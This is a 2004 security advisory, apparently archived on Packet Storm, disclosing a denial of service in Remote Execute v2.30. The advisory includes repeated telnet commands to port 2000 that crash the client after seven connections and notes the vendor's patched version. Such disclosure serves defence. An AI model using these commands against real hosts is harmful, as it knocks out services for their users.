what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

pimpremote.txt

pimpremote.txt
Posted Dec 12, 2004
Authored by Paul Craig

Remote Execute version 2.30 is susceptible to denial of service after receiving seven connections.

tags | advisory, remote, denial of service
SHA-256 | 49ee6e5ceb0bc99d32ba6587548c39a6ffe58de8d31d3b37d1503dc17b3dea83

pimpremote.txt

Change Mirror Download

Pimp industries.
"Its all about the Bling, B&^@# and Fame!"

Dos in Client of Remote Execute v2.30 by IbexSoftware
(C) Paul Craig
Pimp Industries 2004

Background
-------------
Remote Execute 2.30 is vulnerable to an open connection attack, where
after seven connections are created to the client service it will crash
and refuse any further connections.

Exploit:
-------------
Really no need for PoC code here, the exploit is very simple.

telnet remotehost 2000 &
telnet remotehost 2000 &
telnet remotehost 2000 &
telnet remotehost 2000 &
telnet remotehost 2000 &
telnet remotehost 2000 &
telnet remotehost 2000 &
...
Remote execute client is down and port 2000 is now closed....


Company Status:
-------------
IbexSoftware were contacted last week, the problem was reproduced and
today a fix was released by the company.
Pimp industries would like to thank Ibexsoftware for their quick turn
around on this patch release and for their support on full disclosure
matters.

Suggestions/Work Around:
-------------
Install v2.3.01 of Remote Execute, you can download this version from
http://www.ibexsoftware.com/downloadRemoteExecute.asp

Company status
---------------
Pimp Industries is a privately owned security research company. If you
would like to contact Pimp Industries to discuss any nature of business,
please email us at headpimp@pimp-industries.com.


Big Hellos to
-------------
The boys at security-assessment.com, Thor, Viper and sozni.


Paul Craig
Head Pimp , Security Researcher
Pimp Industries
"Move fast, think faster"



Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close